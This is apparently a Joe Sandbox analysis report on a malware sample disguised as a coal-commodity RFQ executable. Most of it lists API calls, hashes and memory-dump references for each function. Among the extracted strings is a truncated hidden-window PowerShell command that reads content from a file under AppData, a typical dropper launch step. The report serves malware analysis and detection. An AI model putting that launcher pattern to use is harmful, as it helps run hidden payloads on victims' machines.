Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D

Uniqueness

Uniqueness Score: -1.00%

Function 004063BC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 004063E5

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: 82e02668318ada1346e4ec156b308e726a090f155bb9469a8f3968b5644ca969
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 86E0B6B2010109BFEF195F90ED5ADBB761DEB08250F01492EF916E4091E6B5E930A674

Uniqueness

Uniqueness Score: -1.00%

Function 004060C3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4

Uniqueness

Uniqueness Score: -1.00%

Function 00406094 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9

Uniqueness

Uniqueness Score: -1.00%

Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749

Uniqueness

Uniqueness Score: -1.00%

Function 0040638E Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,: Completed,?,00000000), ref: 004063B2

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 99177681843bc7d8b33aa39255ce29306f0e35401c43de39655aaedf71f86506
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: DAD0173204020DBBDF119E90ED01FAB3B6DAB08350F014826FE06A40A0D776D534ABA8

Uniqueness

Uniqueness Score: -1.00%

Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7514f4b4cf07e5dbc6536a57cc6181d37764b9883b465a465be066d1c05694d9
Instruction ID: f79479eb79e616cc8aec51f56aa6edc525cb8d4391243906608abe1f76efb7bb
Opcode Fuzzy Hash: 7514f4b4cf07e5dbc6536a57cc6181d37764b9883b465a465be066d1c05694d9
Instruction Fuzzy Hash: 3DD05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B9C945A75D

Uniqueness

Uniqueness Score: -1.00%

Function 004044EC Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D

Uniqueness

Uniqueness Score: -1.00%

Function 004044D5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08

Uniqueness

Uniqueness Score: -1.00%

Function 004034B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055A6: lstrlenW.KERNEL32(spilfgterier,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,spilfgterier,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
Part of subcall function 004055A6: lstrcatW.KERNEL32(spilfgterier,004033F2), ref: 00405601
Part of subcall function 004055A6: SetWindowTextW.USER32(spilfgterier,spilfgterier), ref: 00405613
Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661

Part of subcall function 00405B04: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B2D
Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B3A

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
Part of subcall function 004069C0: GetExitCodeProcess.KERNEL32(?,?), ref: 004069F3

Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: f7ba00b6a143cb033f8d0e109d3a75f5a1742c39fd7faf4fdfb21eb1b2ee77bf
Instruction ID: fabaa3b6efc7a57357b2805df35000a41c8f44054e7a675a900f3985a4c8ce8a
Opcode Fuzzy Hash: f7ba00b6a143cb033f8d0e109d3a75f5a1742c39fd7faf4fdfb21eb1b2ee77bf
Instruction Fuzzy Hash: E8F06772905125ABDB20BBA599849DE72B59B00328B25413FE102B22E1C77C4E469AAE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404991 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049E0
SetWindowTextW.USER32(00000000,?), ref: 00404A0A
SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
CoTaskMemFree.OLE32(00000000), ref: 00404AC6
lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404AF8
lstrcatW.KERNEL32(?,: Completed), ref: 00404B04
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16

Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78

Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
Part of subcall function 004067CF: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859

GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BD9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4

Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A

Strings

tt, xrefs: 00404997
: Completed, xrefs: 00404AF2, 00404AF7, 00404B02
"powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmering, xrefs: 004049AA
C:\Users\user\AppData\Local\Ubarberet, xrefs: 00404AE1
A, xrefs: 00404AB4

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmering$: Completed$A$C:\Users\user\AppData\Local\Ubarberet$tt
API String ID: 2624150263-3258591090
